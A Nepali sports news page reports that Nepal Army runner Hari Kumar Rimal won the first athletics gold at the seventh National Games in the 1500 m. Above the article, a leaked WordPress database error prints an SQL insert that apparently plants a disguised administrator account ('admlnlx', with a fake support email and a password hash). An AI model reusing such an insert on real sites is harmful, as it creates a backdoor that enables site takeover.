WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR43me./RgAR68LVrX44YGuVlOFhL51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 03:14:28', '', 'admlnlx', 'admlnlx')
इटहरी, पुस ९ –
नेपाली सेनाका धावक हरीकुमार रिमालले सातौं राष्ट्रिय खेलकुल अन्तर्गत पहिलो स्वर्ण पदक हात पारेका छन् । रिमालले एथलेटिक्स खेलमा पहिलो स्वर्ण पदक हात पारेका हुन् ।
शनिबार बिहानको खेलमा पुरुषतर्फको दौडमा रिमालले १५ सय मिटरको दुरी ४ मिनेट ४ सेकेण्डमा पार गरेरका थिए ।त्यस्तै सेनाकै अर्का धावक छत्रबहादुर दाहालले रजत पदक पाएका छन् । स्वर्ण र रजत पदक सेनाले पाएपनि कास्य पदक भने नेपाल पुलिसका करण खड्काले हात पारेका छन् ।उक्त दौड खेलमा १३ धावक सहभागी रहेका थिए ।